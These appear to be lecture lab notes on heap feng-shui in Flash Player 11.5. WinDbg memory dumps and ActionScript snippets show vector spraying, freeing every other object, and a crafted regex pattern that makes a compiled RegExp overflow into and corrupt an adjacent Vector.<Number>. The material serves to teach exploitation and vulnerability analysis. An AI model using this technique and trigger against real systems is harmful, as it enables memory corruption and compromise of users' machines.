1. Setting up the environments

    C:\Users\IEUser\Desktop\lec07>ren lec07_heap_feng_shui.as Main.as
    C:\Users\IEUser\Desktop\lec07>c:\AIRSDK4.6\bin\mxmlc -o Main.swf Main.as

    More info.) c:\AIRSDK4.6\bin\mxmlc -help advanced 

2. <MSIE> Open Main.swf using Internet Explorer

    ---------------------------
    Message from webpage
    ---------------------------
    Let's debug the Flash Player
    ---------------------------
    OK   
    ---------------------------

3. <Windbg> Tracking the Vector.<Number> objects

    0:027> s 0 L?10000000 00 00 a0 01 be d5 eb 41 00 00 00 00 00 38 8f 40
                          ----------------------- -----------------------
                          0xdeadf00d              999 (dec)

    08a8ebf8  00 00 a0 01 be d5 eb 41-00 00 00 00 00 38 8f 40  .......A.....8.@

    0:008> dc 0x08a8ebf8 - 0x8 L50
    08a8ebf0  00000010 08554000 01a00000 41ebd5be  .....@U........A
                                -----------------
                                0xdeadf00d
    08a8ec00  00000000 408f3800 00000000 00000000  .....8.@........
              -----------------
              999
    08a8ec10  00000000 00000000 00000000 00000000  ................
    08a8ec20  00000000 00000000 00000000 00000000  ................
    08a8ec30  00000000 00000000 00000000 00000000  ................
    08a8ec40  00000000 00000000 00000000 00000000  ................
    08a8ec50  00000000 00000000 00000000 00000000  ................
    08a8ec60  00000000 00000000 00000000 00000000  ................
    08a8ec70  00000000 00000000 00000000 00000000  ................

    0:008> s 0x08a8ebf8 L-10000 00 05 01 01
                              -----------
                              It's usable for a signature of GCBlock
                              in Flash Custom Heap Manager

    08a7f000  00 05 01 01 28 00 00 00-00 40 55 08 98 26 55 08  ....(....@U..&U.
    08a83000  00 05 01 01 28 00 00 00-00 40 55 08 98 26 55 08  ....(....@U..&U.
    08a88000  00 05 01 01 28 00 00 00-00 40 55 08 98 26 55 08  ....(....@U..&U.
    08a8d000  00 05 01 01 28 00 00 00-00 40 55 08 98 26 55 08  ....(....@U..&U.

    0:008> dc 0x08a8d000 L40
    08a8d000  01010500 00000028 08554000 08552698  ....(....@U..&U.
    08a8d010  089f2000 08a79380 08a88000 00000000  . ..............
    08a8d020  00000000 00000000 01000000 08a8d038  ............8...
    08a8d030  00000000 00000000 60ecc678 00000002  ........x..`....
    08a8d040  089a52b8 08981d90 089b9470 00000000  .R......p.......
    08a8d050  08a8c140 00000000 00000000 00000000  @...............
    08a8d060  60ecc678 00000002 089a52b8 08981d90  x..`.....R......
    08a8d070  089b9470 00000000 08a8c1d0 00000000  p...............
    08a8d080  00000000 00000000 60ecc678 00000002  ........x..`....
    08a8d090  089a52b8 08981d90 089b9470 00000000  .R......p.......
    08a8d0a0  08a8c260 00000000 00000000 00000000  `...............
    08a8d0b0  60ecc678 00000002 089a52b8 08981d90  x..`.....R......
    08a8d0c0  089b9470 00000000 08a8c2f0 00000000  p...............
    08a8d0d0  00000000 00000000 60ecc678 00000002  ........x..`....
    08a8d0e0  089a52b8 08981d90 089b9470 00000000  .R......p.......
    08a8d0f0  08a8c380 00000000 00000000 00000000  ................

    0:008> .reload /i Flash*

    0:008> lm m Flash*
    Browse full module list
    start    end        module name
    60390000 61256000   Flash32_11_5_502_146 M (private pdb symbols)  c:\symbols\Flash.pdb\F0E420FF29FB4B8D86871190534323631\Flash.pdb

    0:008> dt Flash*!*GCBlock*
              Flash32_11_5_502_146!MMgc::GCBlockHeader
              Flash32_11_5_502_146!MMgc::GCAlloc::GCBlock
              Flash32_11_5_502_146!MMgc::GCAlloc::GCBlock

    0:008> dt Flash32_11_5_502_146!MMgc::GCAlloc::GCBlock  08a8d000  
       +0x000 bibopTag         : 0 ''
       +0x001 bitsShift        : 0x5 ''
       +0x002 containsPointers : 0x1 ''
       +0x003 rcobject         : 0x1 ''
       +0x004 size             : 0x28
       +0x008 gc               : 0x08554000 MMgc::GC
       +0x00c alloc            : 0x08552698 MMgc::GCAllocBase
       +0x010 next             : 0x089f2000 MMgc::GCBlockHeader
       +0x014 bits             : 0x08a79380  "???"
       +0x018 prev             : 0x08a88000 MMgc::GCAlloc::GCBlock
       +0x01c firstFree        : (null) 
       +0x020 prevFree         : (null) 
       +0x024 nextFree         : (null) 
       +0x028 numFree          : 0n0
       +0x02a slowFlags        : 0 ''
       +0x02b finalizeState    : 0y1
       +0x02c items            : 0x08a8d038  "x???"

    0:008> dt Flash*!*Vector*Double*
              Flash32_11_5_502_146!avmplus::TypedVectorClass<avmplus::DoubleVectorObject>
              Flash32_11_5_502_146!avmplus::TypedVectorClass<avmplus::DoubleVectorObject>
              Flash32_11_5_502_146!avmplus::TypedVectorObject<avmplus::DataList<double,0> >
              Flash32_11_5_502_146!avmplus::TypedVectorObject<avmplus::DataList<double,0> >

    0:008> dt Flash32_11_5_502_146!avmplus::DoubleVectorObject
       +0x000 __VFN_table : Ptr32 
       +0x004 composite        : Uint4B
       +0x008 vtable           : Ptr32 avmplus::VTable
       +0x00c delegate         : MMgc::GCTraceableBase::GCMember<avmplus::ScriptObject>
       +0x010 m_vecClass       : MMgc::GCTraceableBase::GCMember<avmplus::TypedVectorClassBase>
       +0x014 m_fixed          : Bool
       +0x018 m_list           : avmplus::DataList<double,0>

    0:008> dt Flash32_11_5_502_146!avmplus::DoubleVectorObject 0x08a8d038  
       +0x000 __VFN_table : 0x60ecc678 
       +0x004 composite        : 2
       +0x008 vtable           : 0x089a52b8 avmplus::VTable
       +0x00c delegate         : MMgc::GCTraceableBase::GCMember<avmplus::ScriptObject>
       +0x010 m_vecClass       : MMgc::GCTraceableBase::GCMember<avmplus::TypedVectorClassBase>
       +0x014 m_fixed          : 0
       +0x018 m_list           : avmplus::DataList<double,0>

    0:008> dc 0x08a8d038 + 0x18 <-- means DoubleVectorObject->m_list
    08a8d050  08a8c140 00000000 00000000 00000000  @...............
              --------
              Ptr. DataList
    08a8d060  60ecc678 00000002 089a52b8 08981d90  x..`.....R......
    08a8d070  089b9470 00000000 08a8c1d0 00000000  p...............
    08a8d080  00000000 00000000 60ecc678 00000002  ........x..`....
    08a8d090  089a52b8 08981d90 089b9470 00000000  .R......p.......
    08a8d0a0  08a8c260 00000000 00000000 00000000  `...............
    08a8d0b0  60ecc678 00000002 089a52b8 08981d90  x..`.....R......
    08a8d0c0  089b9470 00000000 08a8c2f0 00000000  p...............

    0:008> dc poi(0x08a8d038 + 0x18)
    08a8c140  00000010 08554000 01a00000 41ebd5be  .....@U........A
              -------- -------- -----------------
              length   GC       1st item, 0xdeadf00d                <-- MMgc::GC
    08a8c150  00000000 408dc000 00000000 00000000  .......@........
              -----------------
              2nd item, 952
    08a8c160  00000000 00000000 00000000 00000000  ................
    08a8c170  00000000 00000000 00000000 00000000  ................
    08a8c180  00000000 00000000 00000000 00000000  ................
    08a8c190  00000000 00000000 00000000 00000000  ................
    08a8c1a0  00000000 00000000 00000000 00000000  ................
    08a8c1b0  00000000 00000000 00000000 00000000  ................

    0:008> dD poi(0x08a8d038 + 0x18) L3
    08a8c140      1.60895097319e-268             3735941133                    952

    0:008> dD poi(0x08a8d038 + 0x18) + 0x8 L3
    08a8c148              3735941133                    952                      0

    0:008> dt Flash32_11_5_502_146!avmplus::DoubleVectorObject 08a8c140 + 0x28 * 0x2f
         --> 0x28 : Size of the DoubleVectorObject object
         --> 0x2f : 47 = 999 - 952
       +0x000 __VFN_table : (null) 
       +0x004 composite        : 0
       +0x008 vtable           : 0x00000010 avmplus::VTable
       +0x00c delegate         : MMgc::GCTraceableBase::GCMember<avmplus::ScriptObject>
       +0x010 m_vecClass       : MMgc::GCTraceableBase::GCMember<avmplus::TypedVectorClassBase>
       +0x014 m_fixed          : ffffffffffffffbe
       +0x018 m_list           : avmplus::DataList<double,0>

    0:008> dc 0x08a8d038 + 0x28 * 0x2f + 0x18
    08a8d7a8  08a8ebf0 00000000 00000000 00000000  ................
    08a8d7b8  60ecc150 00000003 08998348 089c1c70  P..`....H...p...
    08a8d7c8  089c8be0 000003f1 08a453ea 08616fba  .........S...oa.
    08a8d7d8  00000000 00000000 60ecc678 00000002  ........x..`....
    08a8d7e8  089a52b8 08981d90 089b9470 00000000  .R......p.......
    08a8d7f8  08a8ed10 00000000 00000000 00000000  ................
    08a8d808  08a8d858 00000000 00000000 00000000  X...............
    08a8d818  00000000 00000000 00000000 00000000  ................

    0:008> dD poi(0x08a8d038 + 0x28 * 0x2f + 0x18) L3
    08a8ebf0      1.60895097319e-268             3735941133                    999

    0:008> dc poi(0x08a8d038 + 0x28 * 0x2f + 0x18)
    08a8ebf0  00000010 08554000 01a00000 41ebd5be  .....@U........A 
    08a8ec00  00000000 408f3800 00000000 408f4800  .....8.@.....H.@ 
    08a8ec10  00000000 00000000 00000000 00000000  ................
    08a8ec20  00000000 00000000 00000000 00000000  ................
    08a8ec30  00000000 00000000 00000000 00000000  ................
    08a8ec40  00000000 00000000 00000000 00000000  ................
    08a8ec50  00000000 00000000 00000000 00000000  ................
    08a8ec60  00000000 00000000 00000000 00000000  ................


4. <Windbg> Practice of Heap Feng-Shui using a real security vulnerability.

    // Set a processor breakpoint into the 999th Vector.<Number> object
    // ba w4 XXXXXXXX "dD XXXXXXXX L3; dc XXXXXXXX L70;"

    0:028> ba w4 08a8ebf8 ".echo \"----------------\"; dD 08a8ebf8 L3; .echo \"----------------\"; dc 08a8ebf8 L70;"

    /* ******* ACTIONSCRIPT Codes ******* */
    
       objHeaps[999][0] = 11111111; // break
    
    /* ******* End of Codes ******* */

    0:028> g
    ModLoad: 737b0000 737e9000   C:\Windows\System32\MMDevApi.dll
    ModLoad: 6bc60000 6bc96000   C:\Windows\system32\AUDIOSES.DLL
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\Macromed\Flash\Flash32_11_5_502_146.ocx - 
    ----------------
    08a8ebf8                11111111                    999                      0
    ----------------
    08a8ebf8  e0000000 41653158 00000000 408f3800  ....X1eA.....8.@ <-- 999th 
    08a8ec08  00000000 00000000 00000000 00000000  ................
    08a8ec18  00000000 00000000 00000000 00000000  ................
    08a8ec28  00000000 00000000 00000000 00000000  ................
    08a8ec38  00000000 00000000 00000000 00000000  ................
    08a8ec48  00000000 00000000 00000000 00000000  ................
    08a8ec58  00000000 00000000 00000000 00000000  ................
    08a8ec68  00000000 00000000 00000000 00000000  ................

    08a8ec78  00000000 00000000 00000010 08554000  .............@U.
    08a8ec88  01a00000 41ebd5be 00000000 408f4000  .......A.....@.@ <-- 1000th 
    08a8ec98  00000000 00000000 00000000 00000000  ................
    08a8eca8  00000000 00000000 00000000 00000000  ................
    08a8ecb8  00000000 00000000 00000000 00000000  ................
    08a8ecc8  00000000 00000000 00000000 00000000  ................
    08a8ecd8  00000000 00000000 00000000 00000000  ................
    08a8ece8  00000000 00000000 00000000 00000000  ................
    08a8ecf8  00000000 00000000 00000000 00000000  ................

    08a8ed08  00000000 00000000 00000010 08554000  .............@U.
    08a8ed18  01a00000 41ebd5be 00000000 408f4800  .......A.....H.@ <-- 1001th 
    08a8ed28  00000000 00000000 00000000 00000000  ................
    08a8ed38  00000000 00000000 00000000 00000000  ................
    08a8ed48  00000000 00000000 00000000 00000000  ................
    08a8ed58  00000000 00000000 00000000 00000000  ................
    08a8ed68  00000000 00000000 00000000 00000000  ................
    08a8ed78  00000000 00000000 00000000 00000000  ................
    08a8ed88  00000000 00000000 00000000 00000000  ................

    eax=08a8ebf0 ebx=08a8d7a8 ecx=08a8ebf0 edx=00000006 esi=08a8d790 edi=00000000
    eip=608deaa6 esp=03599d8c ebp=03599ef0 iopl=0         nv up ei ng nz na pe cy
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00040287
    Flash32_11_5_502_146!DllUnregisterServer+0x3792f0:
    608deaa6 5f              pop     edi
    
    /* ******* ACTIONSCRIPT Codes ******* */
    
        for (i = 1000; i < 3000; i+=2) {
            objHeaps[i] = null;
        }

        objHeaps[999][0] = 22222222; // break
    
    /* ******* End of Codes ******* */

    0:008> g
    ----------------
    08a8ebf8                22222222                    999                      0
    ----------------
    08a8ebf8  e0000000 41753158 00000000 408f3800  ....X1uA.....8.@ <-- 999th 
    08a8ec08  00000000 00000000 00000000 00000000  ................
    08a8ec18  00000000 00000000 00000000 00000000  ................
    08a8ec28  00000000 00000000 00000000 00000000  ................
    08a8ec38  00000000 00000000 00000000 00000000  ................
    08a8ec48  00000000 00000000 00000000 00000000  ................
    08a8ec58  00000000 00000000 00000000 00000000  ................
    08a8ec68  00000000 00000000 00000000 00000000  ................

    08a8ec78  00000000 00000000 08a8eda0 08554000  .............@U. <-- 1000th freed
                                Next Ptr. of Freelist
    08a8ec88  00000000 00000000 00000000 00000000  ................
    08a8ec98  00000000 00000000 00000000 00000000  ................
    08a8eca8  00000000 00000000 00000000 00000000  ................
    08a8ecb8  00000000 00000000 00000000 00000000  ................
    08a8ecc8  00000000 00000000 00000000 00000000  ................
    08a8ecd8  00000000 00000000 00000000 00000000  ................
    08a8ece8  00000000 00000000 00000000 00000000  ................
    08a8ecf8  00000000 00000000 00000000 00000000  ................

    08a8ed08  00000000 00000000 00000010 08554000  .............@U.
    08a8ed18  01a00000 41ebd5be 00000000 408f4800  .......A.....H.@ <-- 1001th 
    08a8ed28  00000000 00000000 00000000 00000000  ................
    08a8ed38  00000000 00000000 00000000 00000000  ................
    08a8ed48  00000000 00000000 00000000 00000000  ................
    08a8ed58  00000000 00000000 00000000 00000000  ................
    08a8ed68  00000000 00000000 00000000 00000000  ................
    08a8ed78  00000000 00000000 00000000 00000000  ................
    08a8ed88  00000000 00000000 00000000 00000000  ................

    08a8ed98  00000000 00000000 08a8eec0 08554000  .............@U. <-- 1002th freed
    08a8eda8  00000000 00000000 00000000 00000000  ................

    eax=08a8ebf0 ebx=08a8d7a8 ecx=08a8ebf0 edx=00000006 esi=08a8d790 edi=00000000
    eip=608deaa6 esp=03599d8c ebp=03599ef0 iopl=0         nv up ei ng nz na pe cy
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00040287
    Flash32_11_5_502_146!DllUnregisterServer+0x3792f0:
    608deaa6 5f              pop     edi

    /* ******* ACTIONSCRIPT Codes ******* */
    
        var pattern:String = "(?i)()()(?-i)||||||||||||||||||||||";
        var regexp:RegExp = new RegExp(pattern, "")

        objHeaps[999][0] = 33333333; // break
    
    /* ******* End of Codes ******* */

    0:008> g
    ----------------
    08a8ebf8                33333333                    999                      0
    ----------------
    08a8ebf8  50000000 417fca05 00000000 408f3800  ...P...A.....8.@ <-- 999th 
    08a8ec08  00000000 00000000 00000000 00000000  ................
    08a8ec18  00000000 00000000 00000000 00000000  ................
    08a8ec28  00000000 00000000 00000000 00000000  ................
    08a8ec38  00000000 00000000 00000000 00000000  ................
    08a8ec48  00000000 00000000 00000000 00000000  ................
    08a8ec58  00000000 00000000 00000000 00000000  ................
    08a8ec68  00000000 00000000 00000000 00000000  ................

    08a8ec78  00000000 00000000 08a8eda0 00000085  ................ <-- 1000th refilled the compiled pattern of RegExp
    08a8ec88  00000801 00000000 00000002 00000000  ................
    08a8ec98  00000028 00000000 00000000 00000000  (...............
    08a8eca8  5e15005d 01000500 5e050054 02000500  ]..^....T..^....
    08a8ecb8  18050054 05005300 00530018 53001805  T....S....S....S
    08a8ecc8  00180500 18050053 05005300 00530018  ....S....S....S.
    08a8ecd8  53001805 00180500 18050053 05005300  ...S....S....S..
    08a8ece8  00530018 53001805 00180500 18050053  ..S....S....S...
    08a8ecf8  05005300 00530018 53001805 00180500  .S....S....S....

    08a8ed08  18050053 05005300 00530018 53001805  S....S....S....S <-- 1001th was overwritten
    08a8ed18  00180500 18050053 05005300 00530018  ....S....S....S.
    08a8ed28  54001805 00008300 00000000 00000000  ...T............
    08a8ed38  00000000 00000000 00000000 00000000  ................
    08a8ed48  00000000 00000000 00000000 00000000  ................
    08a8ed58  00000000 00000000 00000000 00000000  ................
    08a8ed68  00000000 00000000 00000000 00000000  ................
    08a8ed78  00000000 00000000 00000000 00000000  ................
    08a8ed88  00000000 00000000 00000000 00000000  ................

    08a8ed98  00000000 00000000 08a8eec0 08554000  .............@U. <-- 1002th freed
    08a8eda8  00000000 00000000 00000000 00000000  ................

    eax=08a8ebf0 ebx=08a8d7a8 ecx=08a8ebf0 edx=00000006 esi=08a8d790 edi=00000000
    eip=608deaa6 esp=03599d8c ebp=03599ef0 iopl=0         nv up ei ng nz na pe cy
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00040287
    Flash32_11_5_502_146!DllUnregisterServer+0x3792f0:
    608deaa6 5f              pop     edi

    /* ******* ACTIONSCRIPT Codes ******* */
    
        for (i = 0; i < 4000; i++) {
            try {
                if (objHeaps[i].length != 16)
                    break;
            } catch(e:*) {}
        }

        if (i == 4000)
            return;

        objHeaps[999][2] = i;
        objHeaps[999][0] = 44444444; // break
    
    /* ******* End of Codes ******* */

    0:008> g
    ----------------
    08a8ebf8                44444444                    999                   1001
    ----------------
    08a8ebf8  e0000000 41853158 00000000 408f3800  ....X1.A.....8.@ <-- 999th
    08a8ec08  00000000 408f4800 00000000 00000000  .....H.@........
    08a8ec18  00000000 00000000 00000000 00000000  ................
    08a8ec28  00000000 00000000 00000000 00000000  ................
    08a8ec38  00000000 00000000 00000000 00000000  ................
    08a8ec48  00000000 00000000 00000000 00000000  ................
    08a8ec58  00000000 00000000 00000000 00000000  ................
    08a8ec68  00000000 00000000 00000000 00000000  ................

    08a8ec78  00000000 00000000 08a8eda0 00000085  ................ <-- 1000th refilled the compiled pattern of RegExp
    08a8ec88  00000801 00000000 00000002 00000000  ................
    08a8ec98  00000028 00000000 00000000 00000000  (...............
    08a8eca8  5e15005d 01000500 5e050054 02000500  ]..^....T..^....
    08a8ecb8  18050054 05005300 00530018 53001805  T....S....S....S
    08a8ecc8  00180500 18050053 05005300 00530018  ....S....S....S.
    08a8ecd8  53001805 00180500 18050053 05005300  ...S....S....S..
    08a8ece8  00530018 53001805 00180500 18050053  ..S....S....S...
    08a8ecf8  05005300 00530018 53001805 00180500  .S....S....S....

    08a8ed08  18050053 05005300 00530018 53001805  S....S....S....S <-- 1001th was overwritten
    08a8ed18  00180500 18050053 05005300 00530018  ....S....S....S.
    08a8ed28  54001805 00008300 00000000 00000000  ...T............
    08a8ed38  00000000 00000000 00000000 00000000  ................
    08a8ed48  00000000 00000000 00000000 00000000  ................
    08a8ed58  00000000 00000000 00000000 00000000  ................
    08a8ed68  00000000 00000000 00000000 00000000  ................
    08a8ed78  00000000 00000000 00000000 00000000  ................
    08a8ed88  00000000 00000000 00000000 00000000  ................

    08a8ed98  00000000 00000000 08a8eec0 08554000  .............@U. <-- 1002th freed
    08a8eda8  00000000 00000000 00000000 00000000  ................
    eax=08a8ebf0 ebx=08a8d7a8 ecx=08a8ebf0 edx=00000006 esi=08a8d790 edi=00000000
    eip=608deaa6 esp=03599d8c ebp=03599ef0 iopl=0         nv up ei ng nz na pe cy
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00040287
    Flash32_11_5_502_146!DllUnregisterServer+0x3792f0:
    608deaa6 5f              pop     edi
